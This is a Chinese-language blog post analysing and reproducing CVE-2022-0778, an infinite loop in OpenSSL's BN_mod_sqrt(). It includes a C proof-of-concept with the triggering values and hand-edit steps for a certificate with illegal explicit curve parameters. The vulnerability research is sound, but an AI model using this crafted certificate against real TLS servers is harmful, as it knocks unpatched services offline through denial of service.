OpenSSL CVE-2022-0778漏洞問題復現與非法證書構造

• 2022 年 3 月 20 日
• 筆記
• CVE, OpenSSL, 加密與安全, 漏洞

本文介紹CVE-2022 0778漏洞及其復現方法，並精心構造了具有一個非法橢圓曲線參數的證書可以觸發該漏洞。

本部落格已遷移至CatBro’s Blog，那是我自己搭建的個人部落格，歡迎關注。本文鏈接

漏洞描述^[1]

漏洞出自BN_mod_sqrt()介面函數，它用於計算模平方根，且期望參數p應該是個質數，但是函數內並沒有進行檢查，這導致內部可能出現無限循環。這個函數在解析如下格式的證書時會被用到：

• 證書包含壓縮格式的橢圓曲線公鑰時
• 證書帶有顯式橢圓曲線參數，其基點是壓縮格式編碼的

總之，在解析證書時需要對點坐標進行解壓縮操作的就會調用到這個函數。所以外部可以通過精心構造一個具有非法的顯式曲線參數的證書來觸發無限循環，從而造成DoS拒絕服務攻擊。

官方修補程式commit^[2]

函數分析

我們先簡單過一下這個函數的實現。實現函數簽名如下，a是操作數，p是模數

BIGNUM *BN_mod_sqrt(BIGNUM *in, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx)

首先對p做了簡單的檢查，對p是偶數、1這兩個顯然不是質數的情況直接報錯，對p為2的情況進行了特殊處理。

if (!BN_is_odd(p) || BN_abs_is_word(p, 1)) {
    if (BN_abs_is_word(p, 2)) {
    // ...
    }
    BNerr(BN_F_BN_MOD_SQRT, BN_R_P_IS_NOT_PRIME);
    return NULL;
}

接下來對a是0或1的特殊情況做了特殊處理

if (BN_is_zero(a) || BN_is_one(a)) {
    // ...
}

然後計算A := a mod p，就是計算非負餘數

if (!BN_nnmod(A, a, p, ctx))

下面幾行的字面意思是從p的第1位開始數有幾個連續的0，其實是將|p| – 1表示成如下的格式：|p| - 1 == 2^e * q，即表示成2的冪次方的奇數倍，其中q是奇數。例如p為49，表示二進位是110001，那麼e為4，q為3，49 - 1 == 2^4 * 3

    e = 1;
    while (!BN_is_bit_set(p, e))
        e++;

接下來對e等於1或2的簡單情況進行特殊處理，因為不會走到無限循環，我們跳過

if (e == 1) {
}
if (e == 2) {
}

對於e > 2的情況，就需要老老實實用Tonelli/Shanks演算法來計算了。首先需要找到一個不是平方數的y，且0 < y < |p|，因為不是重點我們跳過。

接下來計算q的值，將p右移e位就得到了q

 	if (!BN_copy(q, p))
    // ...
	if (!BN_rshift(q, q, e))

y := (y ^ q) mod p，因為y是個非平方數，所以計算q次方可以得到一個階為2^e的值。（Don’t ask me why ，注釋這麼寫的🤷‍♂️）

if (!BN_mod_exp(y, y, q, p, ctx))

接下來是計算 x := a^((q-1)/2)

 if (!BN_rshift1(t, q))
     
 if (!BN_mod_exp(x, A, t, p, ctx))

下面兩個計算b := a*x^2 (= a^q)

if (!BN_mod_sqr(b, x, p, ctx))
    
if (!BN_mod_mul(b, b, A, p, ctx))

然後計算x := a*x (= a^((q+1)/2))

if (!BN_mod_mul(x, x, A, p, ctx))

終於要進入我們最關心的循環結構了，這裡有兩層循環，死循環是發生在內層的循環中。我們來看下修改前後的程式碼的區別，下面的是有問題的循環程式碼：

// before
i = 1;
if (!BN_mod_sqr(t, b, p, ctx))
    goto end;
while (!BN_is_one(t)) {
    i++;
    if (i == e) {
        ERR_raise(ERR_LIB_BN, BN_R_NOT_A_SQUARE);
        goto end;
    }
    if (!BN_mod_mul(t, t, t, p, ctx))
        goto end;
}

這個是修復後的循環程式碼：

// after
for (i = 1; i < e; i++) {
    if (i == 1) {
        if (!BN_mod_sqr(t, b, p, ctx))
            goto end;
    } else {
        if (!BN_mod_mul(t, t, t, p, ctx))
            goto end;
    }
    if (BN_is_one(t))
        break;
}

乍一看好像沒什麼區別，只是把while循環改成了for循環。區別非常細微，主要有兩點：

1. 結束循環的判斷條件不同，前者是判斷t是否為1來正常結束，在循環內判斷i == e來異常結束；而後者是判斷i < e來異常結束，循環中判斷t是否為1來正常結束
2. 還有非常重要的一點區別，就是前者i為1的情況並不在循環中

問題就是由於這點細微的區別產生的，考慮這樣一種情況，如下內層循環一開始e就小於等於i（比如e=1），那麼i == e條件將永遠不會滿足。如果再使得t永遠不等於1，那麼就會進入死循環了。

對於第一次進入外層循環，e肯定是大於2的，不會進入死循環，但是別忘了在外層循環最後會把i賦值給e，如下所示：

 while (1) {
        // ...
     	for (i = 1; i < e; i++) {
            // ...
        }
        /* t := y^2^(e - i - 1) */
        if (!BN_copy(t, y))
            goto end;
        for (j = e - i - 1; j > 0; j--) {
            if (!BN_mod_sqr(t, t, p, ctx))
                goto end;
        }
        if (!BN_mod_mul(y, t, t, p, ctx))  // y := t^2 = y^2^(e-i)
            goto end;
        if (!BN_mod_mul(x, x, t, p, ctx))  // x = x*t
            goto end;
        if (!BN_mod_mul(b, b, y, p, ctx))  // b = y^2^(e-i) y is the original
            goto end;
        e = i;
    }

所以結合這些條件，就可以嘗試構造出能夠進入死循環的攻擊方式：

1. 挑選合適的a和p，使得b^2=1(mod p)，其中b是由a計算出來的，這樣外層循環在第一次迭代時不會進入while內層循環，i的值就為1，於是外層循環第二次迭代時e就變成了1
2. 外層循環進行第二次迭代時，只要使得t != 1 (mod p)永遠滿足，就會進入死循環了

注意：第1個條件在p為正常的質數時也是會發生的，但如果p是合數那麼第二條也將滿足。

復現問題

要復現問題，其實就是挑選合適的參數a和p使得上面的條件成立。p的選取需要能夠滿通過函數前面的一些檢查，不能是太明顯的合數，必須是奇數，且e需要大於2，即二進位表示的p必須是…001形式。此外a的選取需要滿足a == -1 (mod p)且b == -1 (mod p)，這樣在第一次外層迭代後e就會設為1，使得第二次進入外層迭代進入死循環。

確定a和p需要一定的數學知識，需要了解Tonelli/Shanks演算法的實現。我不是學數學的，沒學過數論那些東西，所以要完全了解其數學原理需要花些時間。好在drago-96同學幫我們做了這個事情，他最終選取了p=697，a=696這個組合。有興趣的可以看一下數學說明^[3]。

有了a和p，然後寫一個簡單的測試程式就可以復現問題了

#include <openssl/bn.h>

int main() {
    BN_CTX *ctx;
    ctx = BN_CTX_new();
    BIGNUM *res, *a, *p;
    BN_CTX_start(ctx);
    res = BN_CTX_get(ctx);
    a = BN_CTX_get(ctx);
    p = BN_CTX_get(ctx);

    BN_dec2bn(&p, "697");
    BN_dec2bn(&a, "696");

    printf("p = %s\n", BN_bn2dec(p));
    printf("a = %s\n", BN_bn2dec(a));

    BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
    printf("%s\n", BN_bn2dec(res));

    return 0;
}

對於修復前的程式碼，程式執行後會進入死循環

$ ./sqrt
p = 697
a = 696

而修改後可以正常結束。

$ ./sqrt
p = 697
a = 696
0
$ 

構造非法證書

接下來我們來嘗試構造一個非法的證書，使證書帶有顯式橢圓曲線參數，且基點是壓縮格式編碼的。然後我們將證書中曲線參數修改成我們想要的值。

創建一個正常的帶顯式曲線參數的證書

首先我們需要創建一個ec密鑰，因為我們想要證書中包含顯式的曲線參數，所以我們在生成密鑰時也選擇帶顯式參數

$ openssl ecparam -out ec.key -name prime256v1 -genkey -noout -param_enc explicit -conv_form compressed

接著為了方便起見，我們直接自簽發一個證書。這裡將輸出格式設為DER也是為了方便我們後面的修改ASN1結構。

$ openssl req -new -x509 -key ec.key -out cert.der -outform DER -days 360 -subj "/CN=TEST/"

確認一下證書資訊，其中包含了曲線參數資訊：

$ openssl x509 -in cert.der -text -noout -inform DER
...
                Field Type: prime-field
                Prime:
                    00:ff:ff:ff:ff:00:00:00:01:00:00:00:00:00:00:
                    00:00:00:00:00:00:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:ff
                A:
                    00:ff:ff:ff:ff:00:00:00:01:00:00:00:00:00:00:
                    00:00:00:00:00:00:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:fc
                B:
                    5a:c6:35:d8:aa:3a:93:e7:b3:eb:bd:55:76:98:86:
                    bc:65:1d:06:b0:cc:53:b0:f6:3b:ce:3c:3e:27:d2:
                    60:4b
                Generator (compressed):
                    03:6b:17:d1:f2:e1:2c:42:47:f8:bc:e6:e5:63:a4:
                    40:f2:77:03:7d:81:2d:eb:33:a0:f4:a1:39:45:d8:
                    98:c2:96
                Order:
                    00:ff:ff:ff:ff:00:00:00:00:ff:ff:ff:ff:ff:ff:
                    ff:ff:bc:e6:fa:ad:a7:17:9e:84:f3:b9:ca:c2:fc:
                    63:25:51
...                    

其中的Prime、A、B、Generator就是我們需要修改的目標參數。那麼我們應該將其改成什麼呢？然後又通過什麼方法進行修改呢？

構造非法證書

首先，在實際動手我們先需要搞清楚這幾個值是什麼意思、需要滿足什麼關係。定義在有限域上的橢圓曲線滿足如下方程

其中的a就是曲線參數A，b就是曲線參數B，p即為曲線參數Prime，a、b、p參數確定了一條橢圓曲線。解壓縮點坐標就是根據x坐標來計算y坐標，從上面的公式可以看到這需要用到求平方根的運算：

我們沿用之前使用的697/696組合，即此時 p = 697，\(x^3+ax+b=696\)。我們只要選擇合適的a、b、x是後面那個等式成立就可以了。

我們令x=8，a=23，b=0，等式成立。

接下來就要著手修改我們的證書，徒手修改ASN1結構真的是要了我的老命，大家如果知道有什麼方便的工具還請不吝賜教。因為這部分還沒法自動化（至少目前沒有），所以我就講一下大概修改的方法。用到的工具主要是xxd轉成hex格式進行編輯，完成之後再xxd -r轉回去。

1. 你需要修改Prime、A、B、Generator4個目標欄位的值
   1. 其中Prime為697，即十六進位的02b9
   2. A為23，即 十六進位的17
   3. B為0
   4. Generator的x為8，又因為是壓縮格式，將其改成十六進位的020008（或030008）
2. 因為ASN1是嵌套的結構，所以修改了內層長度之後，你還需要把外層的所以長度都進行相應的修正，這是個體力活。
3. 另外OpenSSL程式碼中會對ASN1_INTEGER進行padding格式的檢查，所以Prime值的前面不能多餘的0位元組，所以我們必須修改Prime的長度
4. 而且OpenSSL還會對檢查點字元串長度與Prime的長度的關係（對於壓縮格式，點字元串的長度需要比Prime長度多1），這也是為什麼我們將Genrator設置成030008，而不是0308的原因
5. 還有注意一點，就是xxd -r轉回去之後可能會在文件末尾添加一個0a換行，你需要將其剔除。方法有很多，其中一種就是使用split命令。

我們先來看下證書的ASN1結構，劃紅線的部分都是我們需要修改的部分

$ openssl asn1parse -in cert.der -inform DER -i

Prime、A、B、Generator的目標值上面已經說了，相關長度的修改前後的值已經列在下表中了：

具體的修改過程如下，其中編輯文本的步驟已省略：

$ cp cert.der cert.der.old
$ xxd cert.der cert.der.hex
$ cp cert.der.hex cert.der.hex.old
$ vim cert.der.hex
# edit cert.der.hex
# ...
# complete
$ xxd -r cert.der.hex cert.der.new

到這裡我們的證書就構造好了，現在來看看修改後的ASN1結構：

$ openssl asn1parse -in cert.der.new -inform DER -i

劃紅線的部分都已經被我們修改了，且證書的ASN1編碼是正常的。

使用非法證書測試

OK，現在我們來解析這個構造的非法證書試試，不出意外的話就會進入無限循環了。

openssl x509 -in cert.der.new -inform DER -text -noout

可以看到openssl進程的CPU佔用是100%，且調用棧是在BN_mod_sqrt()函數之中。

如果惡意攻擊方在與伺服器進行SSL握手時使用類似這種精心構造的證書的話，伺服器就會進入死循環，從而造成DoS攻擊。

構造的證書以及中間過程產物已經上傳Github^[3:1]倉庫，有需要的可以自行獲取。

參考材料